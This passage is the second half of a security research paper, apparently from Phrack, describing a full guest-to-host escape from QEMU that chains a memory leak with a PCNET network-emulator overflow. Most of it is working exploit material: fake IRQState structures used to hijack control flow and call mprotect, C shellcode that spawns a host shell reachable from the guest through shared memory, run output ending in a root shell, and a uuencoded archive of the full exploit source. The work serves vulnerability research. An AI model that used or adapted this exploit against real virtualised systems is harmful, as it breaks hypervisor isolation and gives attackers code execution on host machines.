and Rx descriptors and sets the required flags, and finally inits and restarts the card to push our network card config. The rest of the exploit simply triggers the vulnerability that crashes QEMU with a single packet. As shown below, qemu_set_irq is called with a corrupted irq variable pointing to 0x7f66deadbeef. QEMU crashes as there is no runnable handler at this address. (gdb) shell ps -e | grep qemu 8335 pts/4 00:00:03 qemu-system-x86 (gdb) attach 8335 ... (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0) 43 irq->handler(irq->opaque, irq->n, level); --[ 5 - Putting all Together In this section, we merge the two previous exploits in order to escape from the VM and get code execution on the host with QEMU's privileges. First, we exploit CVE-2015-5165 in order to reconstruct the memory layout of QEMU. More precisely, the exploit tries to resolve the following addresses in order to bypass ASLR: - The guest physical memory base address. In our exploit, we need to do some allocations on the guest and get their precise address within the virtual address space of QEMU. - The .text section base address. This serves to get the address of qemu_set_irq() function. - The .plt section base address. This serves to determine the addresses of some functions such as fork() and execv() used to build our shellcode. The address of mprotect() is also needed to change the permissions of the guest physical address. Remember that the physical address allocated for the guest is not executable. ----[ 5.1 - RIP Control As shown in section 4 we have control over %rip register. Instead of letting QEMU crash at arbitrary address, we overflow the PCNET buffer with an address pointing to a fake IRQState that calls a function of our choice. At first sight, one could be attempted to build a fake IRQState that runs system(). However, this call will fail as some of QEMU memory mappings are not preserved across a fork() call. More precisely, the mmapped physical memory is marked with the MADV_DONTFORK flag: qemu_madvise(new_block->host, new_block->max_length, QEMU_MADV_DONTFORK); Calling execv() is not useful too as we lose our hands on the guest machine. Note also that one can construct a shellcode by chaining several fake IRQState in order to call multiple functions since qemu_set_irq() is called several times by PCNET device emulator. However, we found that it's more convenient and more reliable to execute a shellcode after having enabled the PROT_EXEC flag of the page memory where the shellcode is located. Our idea, is to build two fake IRQState structures. The first one is used to make a call to mprotect(). The second one is used to call a shellcode that will undo first the MADV_DONTFORK flag and then runs an interactive shell between the guest and the host. As stated earlier, when qemu_set_irq() is called, it takes two parameters as input: irq (pointer to IRQstate structure) and level (IRQ level), then calls the handler as following: void qemu_set_irq(qemu_irq irq, int level) { if (!irq) return; irq->handler(irq->opaque, irq->n, level); } As shown above, we have control only over the first two parameters. So how to call mprotect() that has three arguments? To overcome this, we will make qemu_set_irq() calls itself first with the following parameters: - irq: pointer to a fake IRQState that sets the handler pointer to mprotect() function. - level: mprotect flags set to PROT_READ | PROT_WRITE | PROT_EXEC This is achieved by setting two fake IRQState as shown by the following snippet code: struct IRQState { uint8_t _nothing[44]; uint64_t handler; uint64_t arg_1; int32_t arg_2; }; struct IRQState fake_irq[2]; hptr_t fake_irq_mem = gva_to_hva(fake_irq); /* do qemu_set_irq */ fake_irq[0].handler = qemu_set_irq_addr; fake_irq[0].arg_1 = fake_irq_mem + sizeof(struct IRQState); fake_irq[0].arg_2 = PROT_READ | PROT_WRITE | PROT_EXEC; /* do mprotect */ fake_irq[1].handler = mprotec_addrt; fake_irq[1].arg_1 = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT; fake_irq[1].arg_2 = PAGE_SIZE; After overflow takes place, qemu_set_irq() is called with a fake handler that simply recalls qemu_set_irq() which in turns calls mprotect after having adjusted the level parameter to 7 (required flag for mprotect). The memory is now executable, we can pass the control to our interactive shell by rewriting the handler of the first IRQState to the address of our shellcode: payload.fake_irq[0].handler = shellcode_addr; payload.fake_irq[0].arg_1 = shellcode_data; ----[ 5.2 - Interactive Shell Well. We can simply write a basic shellcode that binds a shell to netcat on some port and then connect to that shell from a separate machine. That's a satisfactory solution, but we can do better to avoid firewall restrictions. We can leverage on a shared memory between the guest and the host to build a bindshell. Exploiting QEMU's vulnerabilities is a little bit subtle as the code we are writing in the guest is already available in the QEMU's process memory. So there is no need to inject a shellcode. Even better, we can share code and make it run on the guest and the attacked host. The following figure summarizes the shared memory and the process/thread running on the host and the guest. We create two shared ring buffers (in and out) and provide read/write primitives with spin-lock access to those shared memory areas. On the host machine, we run a shellcode that starts a /bin/sh shell on a separate process after having duplicated first its stdin and stdout file descriptors. We create also two threads. The first one reads commands from the shared memory and passes them to the shell via a pipe. The second threads reads the output of the shell (from a second pipe) and then writes them to the shared memory. These two threads are also instantiated on the guest machine to write user input commands on the dedicated shared memory and to output the results read from the second ring buffer to stdout, respectively. Note that in our exploit, we have a third thread (and a dedicated shared area) to handle stderr output. GUEST SHARED MEMORY HOST ----- ------------- ---- +------------+ +------------+ | exploit | | QEMU | | (thread) | | (main) | +------------+ +------------+ +------------+ +------------+ | exploit | sm_write() head sm_read() | QEMU | | (thread) |----------+ |--------------| (thread) | +------------+ | V +---------++-+ | xxxxxxxxxxxxxx----+ pipe IN || | x | +---------++-+ | x ring buffer | | shell | tail ------>x (filled with x) ^ | fork proc. | | | +---------++-+ +-------->--------+ pipe OUT || +------------+ +---------++-+ | exploit | sm_read() tail sm_write() | QEMU | | (thread) |----------+ |--------------| (thread) | +------------+ | V +------------+ | xxxxxxxxxxxxxx----+ | x | | x ring buffer | head ------>x (filled with x) ^ | | +-------->--------+ ----[ 5.3 - VM-Escape Exploit In the section, we outline the main structures and functions used in the full exploit (vm-escape.c). The injected payload is defined by the following structure: struct payload { struct IRQState fake_irq[2]; struct shared_data shared_data; uint8_t shellcode[1024]; uint8_t pipe_fd2r[1024]; uint8_t pipe_r2fd[1024]; }; Where fake_irq is a pair of fake IRQState structures responsible to call mprotect() and change the page protection where the payload resides. The structure shared_data is used to pass arguments to the main shellcode: struct shared_data { struct GOT got; uint8_t shell[64]; hptr_t addr; struct shared_io shared_io; volatile int done; }; Where the got structure acts as a Global Offset Table. It contains the address of the main functions to run by the shellcode. The addresses of these functions are resolved from the memory leak. struct GOT { typeof(open) *open; typeof(close) *close; typeof(read) *read; typeof(write) *write; typeof(dup2) *dup2; typeof(pipe) *pipe; typeof(fork) *fork; typeof(execv) *execv; typeof(malloc) *malloc; typeof(madvise) *madvise; typeof(pthread_create) *pthread_create; typeof(pipe_r2fd) *pipe_r2fd; typeof(pipe_fd2r) *pipe_fd2r; }; The main shellcode is defined by the following function: /* main code to run after %rip control */ void shellcode(struct shared_data *shared_data) { pthread_t t_in, t_out, t_err; int in_fds[2], out_fds[2], err_fds[2]; struct brwpipe *in, *out, *err; char *args[2] = { shared_data->shell, NULL }; if (shared_data->done) { return; } shared_data->got.madvise((uint64_t *)shared_data->addr, PHY_RAM, MADV_DOFORK); shared_data->got.pipe(in_fds); shared_data->got.pipe(out_fds); shared_data->got.pipe(err_fds); in = shared_data->got.malloc(sizeof(struct brwpipe)); out = shared_data->got.malloc(sizeof(struct brwpipe)); err = shared_data->got.malloc(sizeof(struct brwpipe)); in->got = &shared_data->got; out->got = &shared_data->got; err->got = &shared_data->got; in->fd = in_fds[1]; out->fd = out_fds[0]; err->fd = err_fds[0]; in->ring = &shared_data->shared_io.in; out->ring = &shared_data->shared_io.out; err->ring = &shared_data->shared_io.err; if (shared_data->got.fork() == 0) { shared_data->got.close(in_fds[1]); shared_data->got.close(out_fds[0]); shared_data->got.close(err_fds[0]); shared_data->got.dup2(in_fds[0], 0); shared_data->got.dup2(out_fds[1], 1); shared_data->got.dup2(err_fds[1], 2); shared_data->got.execv(shared_data->shell, args); } else { shared_data->got.close(in_fds[0]); shared_data->got.close(out_fds[1]); shared_data->got.close(err_fds[1]); shared_data->got.pthread_create(&t_in, NULL, shared_data->got.pipe_r2fd, in); shared_data->got.pthread_create(&t_out, NULL, shared_data->got.pipe_fd2r, out); shared_data->got.pthread_create(&t_err, NULL, shared_data->got.pipe_fd2r, err); shared_data->done = 1; } } The shellcode checks first the flag shared_data->done to avoid running the shellcode multiple times (remember that qemu_set_irq used to pass control to the shellcode is called several times by QEMU code). The shellcode calls madvise() with shared_data->addr pointing to the physical memory. This is necessary to undo the MADV_DONTFORK flag and hence preserve memory mappings across fork() calls. The shellcode creates a child process that is responsible to start a shell ("/bin/sh"). The parent process starts threads that make use of shared memory areas to pass shell commands from the guest to the attacked host and then write back the results of these commands to the guest machine. The communication between the parent and the child process is carried by pipes. As shown below, a shared memory area consists of a ring buffer that is accessed by sm_read() and sm_write() primitives: struct shared_ring_buf { volatile bool lock; bool empty; uint8_t head; uint8_t tail; uint8_t buf[SHARED_BUFFER_SIZE]; }; static inline __attribute__((always_inline)) ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring, char *out, ssize_t len) { ssize_t read = 0, available = 0; do { /* spin lock */ while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); if (ring->head > ring->tail) { // loop on ring available = SHARED_BUFFER_SIZE - ring->head; } else { available = ring->tail - ring->head; if (available == 0 && !ring->empty) { available = SHARED_BUFFER_SIZE - ring->head; } } available = MIN(len - read, available); imemcpy(out, ring->buf + ring->head, available); read += available; out += available; ring->head += available; if (ring->head == SHARED_BUFFER_SIZE) ring->head = 0; if (available != 0 && ring->head == ring->tail) ring->empty = true; __atomic_clear(&ring->lock, __ATOMIC_RELAXED); } while (available != 0 || read == 0); return read; } static inline __attribute__((always_inline)) ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring, char *in, ssize_t len) { ssize_t written = 0, available = 0; do { /* spin lock */ while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); if (ring->tail > ring->head) { // loop on ring available = SHARED_BUFFER_SIZE - ring->tail; } else { available = ring->head - ring->tail; if (available == 0 && ring->empty) { available = SHARED_BUFFER_SIZE - ring->tail; } } available = MIN(len - written, available); imemcpy(ring->buf + ring->tail, in, available); written += available; in += available; ring->tail += available; if (ring->tail == SHARED_BUFFER_SIZE) ring->tail = 0; if (available != 0) ring->empty = false; __atomic_clear(&ring->lock, __ATOMIC_RELAXED); } while (written != len); return written; } These primitives are used by the following threads function. The first one reads data from a shared memory area and writes it to a file descriptor. The second one reads data from a file descriptor and writes it to a shared memory area. void *pipe_r2fd(void *_brwpipe) { struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; char buf[SHARED_BUFFER_SIZE]; ssize_t len; while (true) { len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf)); if (len > 0) brwpipe->got->write(brwpipe->fd, buf, len); } return NULL; } SHELLCODE(pipe_r2fd) void *pipe_fd2r(void *_brwpipe) { struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; char buf[SHARED_BUFFER_SIZE]; ssize_t len; while (true) { len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf)); if (len < 0) { return NULL; } else if (len > 0) { len = sm_write(brwpipe->got, brwpipe->ring, buf, len); } } return NULL; } Note that the code of these functions are shared between the host and the guest. These threads are also instantiated in the guest machine to read user input commands and copy them on the dedicated shared memory area (in memory), and to write back the output of these commands available in the corresponding shared memory areas (out and err shared memories): void session(struct shared_io *shared_io) { size_t len; pthread_t t_in, t_out, t_err; struct GOT got; struct brwpipe *in, *out, *err; got.read = &read; got.write = &write; warnx("[!] enjoy your shell"); fputs(COLOR_SHELL, stderr); in = malloc(sizeof(struct brwpipe)); out = malloc(sizeof(struct brwpipe)); err = malloc(sizeof(struct brwpipe)); in->got = &got; out->got = &got; err->got = &got; in->fd = STDIN_FILENO; out->fd = STDOUT_FILENO; err->fd = STDERR_FILENO; in->ring = &shared_io->in; out->ring = &shared_io->out; err->ring = &shared_io->err; pthread_create(&t_in, NULL, pipe_fd2r, in); pthread_create(&t_out, NULL, pipe_r2fd, out); pthread_create(&t_err, NULL, pipe_r2fd, err); pthread_join(t_in, NULL); pthread_join(t_out, NULL); pthread_join(t_err, NULL); } The figure presented in the previous section illustrates the shared memories and the processes/threads started in the guest and the host machines. The exploit targets a vulnerable version of QEMU built using version 4.9.2 of Gcc. In order to adapt the exploit to a specific QEMU build, we provide a shell script (build-exploit.sh) that will output a C header with the required offsets: $ ./build-exploit <path-to-qemu-binary> > qemu.h Running the full exploit (vm-escape.c) will result in the following output: $ ./vm-escape $ exploit: [+] found 190 potential ObjectProperty structs in memory $ exploit: [+] .text mapped at 0x7fb6c55c3620 $ exploit: [+] mprotect mapped at 0x7fb6c55c0f10 $ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347 $ exploit: [+] VM physical memory mapped at 0x7fb630000000 $ exploit: [+] payload at 0x7fb6a8913000 $ exploit: [+] patching packet ... $ exploit: [+] running first attack stage $ exploit: [+] running shellcode at 0x7fb6a89132d0 $ exploit: [!] enjoy your shell $ shell > id $ uid=0(root) gid=0(root) ... ----[ 5.4 - Limitations Please note that the current exploit is still somehow unreliable. In our testing environment (Debian 7 running a 3.16 kernel on x_86_64 arch), we have observed a failure rate of approximately 1 in 10 runnings. In most unsuccessful attempts, the exploit fails to reconstruct the memory layout of QEMU due to unusable leaked data. The exploit does not work on linux kernels compiled without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case QEMU binary (compiled by default with -fPIE) is mapped into a separate address space as shown by the following listing: 55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64] 55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ... 55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ... 55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0 55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0 [heap] 7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0 7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0 [2 GB of RAM] 7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0 ... 7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385 [first shared lib] 7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385 ... 7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385 ... 7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385 ... ... 7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0 [stack] 7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0 [vvar] 7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] As a consequence, our 4-byte overflow is not sufficient to dereference the irq pointer (originally located in the heap somewhere at 0x55xxxxxxxxxx) so that it points to our fake IRQState structure (injected somewhere at 0x7fxxxxxxxxxx). --[ 6 - Conclusions In this paper, we have presented two exploits on QEMU's network device emulators. The combination of these exploits make it possible to break out from a VM and execute code on the host. During this work, we have probably crashed our testing VM more that one thousand times. It was tedious to debug unsuccessful exploit attempts, especially, with a complex shellcode that spawns several threads an processes. So, we hope, that we have provided sufficient technical details and generic techniques that could be reused for further exploitation on QEMU. --[ 7 - Greets We would like to thank Pierre-Sylvain Desse for his insightful comments. Greets to coldshell, and Kevin Schouteeten for helping us to test on various environments. Thanks also to Nelson Elhage for his seminal work on VM-escape. And a big thank to the reviewers of the Phrack Staff for challenging us to improve the paper and the code. --[ 8 - References [1] http://venom.crowdstrike.com [2] media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf [3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c [4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf [5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt [6] https://blog.affien.com/archives/2005/07/15/reversing-crc/ --[ 9 - Source Code begin 644 vm_escape.tar.gz M'XL(`"[OTU@``^Q:Z7,:29;W5_%7Y*AC.L"-I<RJK*RJMML3"$H6801:0#ZV M#R)/B6BN@<(M;4_OW[XO7R*!D+KMV)C>C8V=^B"*S'?^WI$OL3]-1W:EY<(> M/_O3'@I/FB3^DZ4)W?V\>YZQF`J>BC3FXAEE4<RC9R3Y\TS:/NM5*9>$/)N6 M<J+&OT_WN?W_H\^G^_A/I^LC_:?H\`$6G/]>_".:I#[^,=!`!C"(?PS?GA'Z MIUBS]_P_C_]7XYF>K(TEKU:E&<^/KE]7=I>6X]G5_IH9S\I':Y.Q>KCF]*R< M/%R2JY5=[K&"K/)V85=^M?*5L6X\L^2B\:88#<[:IT-"6+2WW/[W@A!29>35 MJQW"VI;JM#NZZ!>#HCL$JO5DX@E%O$=PVB7^J=Y3)$F-O""L5JF`2<29EY7* M&M[B:%22A;RRH[ES*UM6[Q>E,<M:Y=>*%[.TY7HYPR7RM1>Z9QQ*?EGY+<@4 M'-BO/LE1.1]=N5GUTWQLR/,[>0?W)(NIK1,@>%DY6(W_P\)*L`&^AQ?R'>CR MY(MR.2IKJ/[U:Y+7P(C_3(%LLK+VYZHS]0UGG0R*XNUH4`S!FH.EE08WOT9- MF5\;.U+]2Q6^@X@=)&NURL'!QLL7#.C`+-"^0W?:18E(@38_Y>Q"_JZS0>`. M*D@",D/65/W^7[X#Y;6M'ES<0_H?#Z)5O9-?VXC[+<1W*L>SZKT!&>A_#AB^ MW`4?()W:*:3!@3-@V7QA9]7#X\5RKH]7=N*.O9JI7!S626_4;_6ZG8]W^`'] M*T)K!*0?+.QR.5]6#SW[H2<XL#?CLHI>@"T'H`:$3^5D,M?5*!%^'<I.+VZK ML%4GA^^O[=(2.27MOR'_`DJR=-7#OZY^F(%N(,+58.T.@@#UW=Z&X^-\O22+ MZ]O56,L)YJI=K<AX161)Z,U?#R_Z[1O!#^_$>GDU[_X&;.K!^]]N5_]Z_LG/ M]OS_-'T1WO[I4\`?G_]I$D7L;OY+$K_.>)S2?YW__Q//\?-*<[ZX78ZOKDM2 MU34242;JY-Q>FS$9>I?KY$*N)^14+L<6NE2E`><EDJ_@V(/6_,F:HTJE;\W8 MCPMJ78[G<!+.#%FO+!G/R`K:CK:XHL8SN;PE;KZ<KNKDEW%Y3>9+_)ROR\IT M;L8.>I,74"<2NAXTS^FX+*TAT'8_C0V\E-?0K<IK"T+`F%]@/"%Z/C-CS[1" MIJDMOZU4V!%Y:-(*CL`[6_0<1H\I1-X?W'`2H$"IYI_\UAT8LWDYUK9>*:^A M14Y`DA>PJVMF]@P!=7HBQU.[!$"BQP:`HAT$[@P`U\P:C'K"ALK&!O+?L8$$ MORIFKM=3.ROE76".`?,Y["SAV"GM<BPGJRV^&!0O<M=T<"<^(ET[1BZ_.Y-P M\H,M_GT+V?5\8H!@-M\2(>SC<E4!JX.\^7(%BF^)LCY#P/XYL3,#J]8G`Q@R MG9>6!%0@QT#@&%*,.-A`'"JKN2M_\9'>)`Y9+:SVF0-,8Y]/2Y\SLY`]JU6P M?WC6'I!![W3XOM$O"+Q?]'OOVJVB14X^DN%909J]BX_]]INS(3GK=5I%?T`: MW1:L=H?]]LGEL`<+AXT!<!Y6_$:C^Y$4'_QT-""]/FF?7W3:(`RD]QO=8;L8 MU$F[V^Q<MMK=-W4"`DBW-R2=]GE["&3#7MTKK3QF([U3<E[TFV?PM7'2[K2' M']&0T_:PZW6=@K(&##S]8;MYV6GTR<5E_Z(W*"K>K59[T.PTVN=%ZPBT@T92 MO/-C\."LT>D\Z:6W_8&/)T6ETVZ<=(J@";QLM?M%<^C=V;XU`3FPKP/SY$71 M;/N7XD,!SC3Z'V$>ZE=`YJ#XMTL@@DW2:IS#A#8@U<]``C%I7O:+<V]S[[0R MN#P9#-O#RV%!WO1Z+01Z4/3?M9O%X"7I]`:(UN6@J(.&8<,K]B(`*MB&]Y/+ M0=N#5FEWAT6_?WDQ;/>Z-?#\/<`"?C>`M87H]KKH*B#4ZW_T0CT&"'Z=O#\K M8!U"W*T@4@T/P0`0:PYWR4`?`#C<\9%TBS>=]INBVRS\;L]+>=\>%#6(57O@ M"=I![?L&Z+ST+F.,P*KPNI.Q=8PD:9^21NM=VYL=B"L0^T%[DR>P-+ALGFW@ M/JH\/Z[L7M)N5\>/+GBP-IW*6;A];2]JRX4\AJM2^?G[&XRWG[WW[=[QMJN3 M,?3VO;5%>>TO)8]NEVH^GWS1-?3Q#?;QS?2I6^UZ!NW./(3A\.]VNCZZ/GSZ M7NJ?W[F;DB^^GP;*S]Q1?^>>>D]Z]G'4;YS?D]*;;//#RM9PO!+)R?AJ!IUT M-))E:,5V-*I6-\O5>P]JM:WP<(V:N^H*[H[3&O"J]7A2CF>CO9U[#A]I:/FC M47@9C;96G+>[55DGJD:JOY(?*N3))[!5)>B2_GXK:R\_1PL"1\K3JC^@!6FO M/=G?_)]OX>M+\EMM:QNTR'[1&IU<GIX6_1!(%F7;_4[1>#LZ;WP`>*,'T#;/ M+KMOD0&V!V_AW@V!VMGN=7H@[ZR`!GSX`XWC[V/VDK+IZAJ&*?Q.Z10L.]PU M!8B;O591]0>HQURNIA"IK_S7PQ$<EM\>_H&CA-@;.-9G1%_#8(L']5=?$<_V M_8\OG]`RNF@TWU87\G8REZ9.@LY??X!KZ.9'!S35CTPCO^!Q#G?XVJYLR,G= M96_>`5P@_3WVZSOAM1>O_5[04=^3BQ[]]J1]G6&P\6H.J;:8P!^WGL&H"M]? MO/:O8!.HJV[2(6P^KU5+`()\0W`![6RT6GTP=%A\&.)[;2<!NN?%^8E/.V\, M)N#QW=OW]$<@]-*!EMS_0G"-O[J\O)=PUKV$(%>K8;U&;^A.D<+=^NQBV"?A MDOV$L`#V3H#ZPT[&XOQA2B:,;V4VN\7PP38AG.:BLD=QX8\EWQ<T@\3=%X^[ ML/<PJ2]&_0^CWOONP\2JLE>OXIW6$\C@S'R"C.Z3[1@:*J7JZ5A\][/;#O7P MRW0/OTPWD)T.R&.R*-\GZSQ)ECTB>P/-^Q%9ND_6OF@.'DECCZ1=MO;HD.R1 MM&'S*3*Q3_8P';Z$;!.,Q^PA+':VGMXGR])>P3EI88+_M7(PO&D8LZ1!S7?8 M&.OD^#D9WL#0OM++\0)G?3A@5G.XH:R7)([4N*P=$1A,#IK7XT5S:K;<<5KW M,IOSF1M?W:]R"JO]1ZL<:2_@VD.V$EHYZB^AK4#S&R_\U4)?6_WSODG.WQ+F MRY^#(5LS@I@BN-'\AC3G?C@RY,YM0.D;,O67Q_EL<EM#]OY-'Z8)CT2G%]@Y ML@O^`IPE_M>%\%NQOPCU;XB?/?88S]J!,?LBQM]>[@4EX'`"PY2/2O-BLE[= M0[=#C+0;U.^)IZ9O_0_)P7/FP?9K-\5,;=9H%M:&NVL<@W*R=L5T4=Z&-?9` M6V<4]"W`FEV%WKK^S;M.HWLGB_*`MYU)-;&`M;9PX2-(8N!Z?G5UA]B&N7G] M\V`]W3!'3S)CU%=`!%.*/WGV)`1/-A)H5-]L#/<VGO2HO!EI3,:1VO@TO.G, MYXL3"7GVW6;N@RHG_[A[3VN[)DZ`5GG:TL)U'I/)6W;\_.CH:"^Z0>'R9N2I M[M4UM+:+LE@N=U(V\H$+&_WUK-QNL.W&R1*`T')5;L,:-L[7,-!M-_AVX_;B M^G9U#TATO]&83#8[=Y$_>+^4B]WN]!W.H;!Q?M,Z;T2)V-W@%*M:=>Q,\`<L M+`M;-Z?#ZX1%NUN2TDU"W[6R5O\#[H9@;9>'.\O;";W3ZUW<+V]/T=:'\^$I M=%9<SNZ7X<K8N:/F=$=E\]U%@]Q-@;O+)TT27*,[IW[O/`C)\'C%P(9#^4$G M[;<NMM'J-S9?/-[]P3!\X0]=;_:;5;W4=<ATF*;AS:>>_WC]FD#N_43@O93J M>US[";:N:_X?A>B-<WZ6@72\LC.[E/ZWM?7*EX?_P:9Q.>S!S96TVV0QG]S. MYM.QG%3(\X.;G^(()JF;GR(1/N+P$189+`8JMEE@X8/B1X9_4_R;X%\>N`,1 M_&457P,K_Q.5]C]O02K>_S/;QA'(H!_!1P`+`X5/'?Q)4YK&,/3X=VNI%2S2 M_CW/:9XP)>O(D`JC.<N1@0KI>.:0(1>Q3.($&:S@>2+CP&"-RK(X0H;<:)5) MC@S4)#9G%AE2$YD\RP)#K@37D4(&JUBJE4&&5&61H2DR4.68R1DR,*-21@5* M%5)!'W.HS<4J3QG/_'O&E>7,V,`@C30\1:G"&&.Y16V.&ZZ2A"%#;.(LT6E@ MB(7.LP21$5PHF6E$S!D1N3R5R"!%HG.K`P.G+-$<D1$Q%4(;1,Q)ZF(C8F0P M-*/&)<@0*V$CJM%6KD7.:(+(F$10SBSZ)B.1IBR-`H.FL>4&;>6*@N4<D3$1 M-5GBT#>94*D2H0)#HA*9.;251RK*,X'1-4HIG1OT36JE78YS`C!$!D@LVLH3 M,%2G&%VCC:!&HV]2&1:;)$>&2)@\IA*E)H`UI3%JTYE)$^A&_ETY0P5C(C`P MQ1T@C@Q"Q9I'J$T[)?,D1\14I@SXX0)#1B.5Y8A,XFB29101TX("P`JCKAA5 M-H]X8'#"I3I#9)),9%PS1$PS,,)(C+H20D0F-LBPR6ZTE6X2"Q,N,U%$%?IF MG4D8C4(]I$RQ+,G05BJ44`E#9'*GG.42?;.9R@R/0SVD&4UU+M%6ZBAU>8S1 MS07-99:A;Y91FV<LU$/JA*00)63(!%@:871S!JFH<_3-"A$GFH9ZV%B!4ID6 M6C"!VB"!DQBR`Q,Q$M!U>:@'H:G($XM2F:),)BEJRR*:.8`,&2`&FB>A'D2B MJ,DU(L,BE=H\0<0RI:S*+$;=:045G89Z`(`-,P:188F1D>&(6*9-G&J'47<* M<EB+4`_<J$BP!&V-I2]*C<C(6,'U*D7?H%A53&VH!RZ-DPE'6V-CLCPQB(R$ M&M%<H&\`G7#<A7K@L<BA::&M,1?6Y`ZC*XU(LXRC;T8*"J$+]<`YY9%)T5;_ MGVH@PS&Z4E+)=8*^&4--JG6HAX32)&4Q2HU2&G$F49NR%)*4(6(ZIQI0#O60 MI")32812(RI<EBC4IG(A#%Q'D0':LN5YJ(?$7WQSBLA$.40DSQ$QB`[-LPBC MKE.3RDR%>DAR%<>&(3*151RR`1%3J3*)CC'JFBHIM`SUL&G>:&LNE5/0J#`1 M-PT+FS17S$1YJ`<K3<+3&&W-C8G25"(R=!-19(@-%&`6ZL'&T"`50UMS+GBL M,HPN-<((&:-OJ10RD3+4@^74:D?15N@WN7,Y1I?"5"-MA+ZE<$[D<'8@PZ;( M4&J6TDQ"!6$B6LJ@#A`QD5.A(Q?JP:4B2M($I694)`*.(&3(A8Y%BH@)*Q05 M-M2#LX8SE2(R66[@;F81,4:-3,%R9$B-X5*'>G"YR@WT)F2PREIP`AE2B(3E M&'5(/9I9$^IA`P;:*IEA>9PB,G%F,AUI](T[XUR4A'HP3"F1.K15"J4AMQ"9 MV*F$PJ&'#)F*8L%#/1@XC"+HM<C@J(3>C-&-!8VY=.@;9Y1#+$(]@/W4.HVV MR@S<<PE&-V;"9N`1,@B1*YN&>M!*,!5G*%5I`0G`4!O,(\Y$$A%+(!X6C`H, MFNHTS5&J4E3QE*(VZ,01$PH12Q(*/%&H!YTH:!`*D5'@#%41(A8IQ1.98]03 MK6)HJ*$>-!2T<Q*148FAT(H0L0B.DQS:-C(H8Z5EH1XVLPG::K6(710A,FDB MI(QS](UN#L+`H"FDED1;K:(^VQ&9-())*LW0-[KI%($A48[+#&VU<-JEDF%T M4P5%HB3Z1C=0!H;(1)G-T5:;F`1R#Z.;:J.M4^@;5489%X5ZV)PA*!6F*&XC MCMI$9HR*'2+&G)%9+$(]9$Q9!B,,,@#N$?1_9'"*IJE%Q%BF4IZFH1[\N9Q( MB\@X1^$`2Q$Q(:B`!HY19[X%JB340^9$DD,1($,F(N!%Q.#H4LX9C#J#*4H[ M'NIA4^MHJTDI-!J+R'!+>18GZ%N<0Y>*=:@'"6A'0J"M,()0!H,!,N0BYRE' MWV(+!9V:4`_2&B8D1UL-S$<)W/B0`68V"C,#,J0FBY4+]2!S\,PF:*NQ2L$L MB-'EJ8JT2]$WZ'2)^Z_VOK6YC1M9]'Z5?L7$ZR@4+=GS?JPBG_*-G7-2-XE] M96?/5MD*:YX6;8K4<BA;/G'VM]]^`#.8&<R0<AZ;[!U6V2(!=`-HH!M`H]%= MY,P/8DP(:QK#0=8.J38/6AW!"D,3T4W<V(F9'Y(X,X$="6N:0;?]B&KS7%B* M`ILH9CM9Y`<)\P/,=#^(;:(,+(*6&R=$,2_S84Q-&G4[]@L[B9@?8$4`]G&( M,JD#^]$\)HIYL0D[0(M&'?;@=EZ$&9^BRLWZ.MT8Z\V"3MBH&C*$*1B=.;+W MYDGCIZ7^3*Z+V6+53KF8G^APD];F)[+IZE0YQ?\!#^G-6Y\IX"SR->.$X]IE MO$"C`3BNS:^,JSA]FV_XKCY=K=?75WB.NX!E+%^3_EHY3DG[-EFS@'U9G:8\ MEC"\?O$*8//^@M)]EG"]90@%+Z]AG>UZ]7<!(.8825Z6Y#*7-BK\PV\7XC.+ M0&W5_W-Z+-/I#&:W@5FHLE1G!BY8S,9U;I7.D[7.\,1JV$:J?I<=5$?^*EWF M&Z$CDK/*\F$$2-ES4EL<&L9ZD2\;"9MVPF6<OO3/3Q0L,VETTRBWB+/UR_!< MG93&^F8F)EB=MI%IG09WF(!TCVC1*)MO0.->;RXXB:M%+>7FNIQ9ND2[4?/E MO-D4I1_<EL9LY3;Q7'W9N>BX[=REHH.%JKFK-H8-@8U3LGB5U/KF[/\^A^Q< MTHKZ/%NN-A?`Z2]=%\>`;X"0%!?Q,EL@&RMI\?JU)!B3AE+LQIC@U?-LE;S) MTPT:J0I@NEFK?N$=4OU+ZK?GJV6=^)J,A<6/4OT!U%\MWN5JPB*/RYQ;P3=Y M5_.K?+:VBTS<[,V2]7M,.SQ1"\`V:-TM(#ORGT]?(*7$U1Q:P1ZJ4@X33JKL M=+$J<R5_2@EU/MH&-,`QH<Y&PY\&."74^=GUE=T`QX0ZFUJN9F-"G0WB]VTC M&Q/J[!RV5N_4RBFASF<3W[K`E!/4`MF[N=+]J4A0&LC6$;,4_L>.3IL)S9[0 MP!TJ/:&$5AD<NT893.`I(*:%,A%G5VL8KO7FPPRFE5P_U#2T,(A+NED]:N6@ 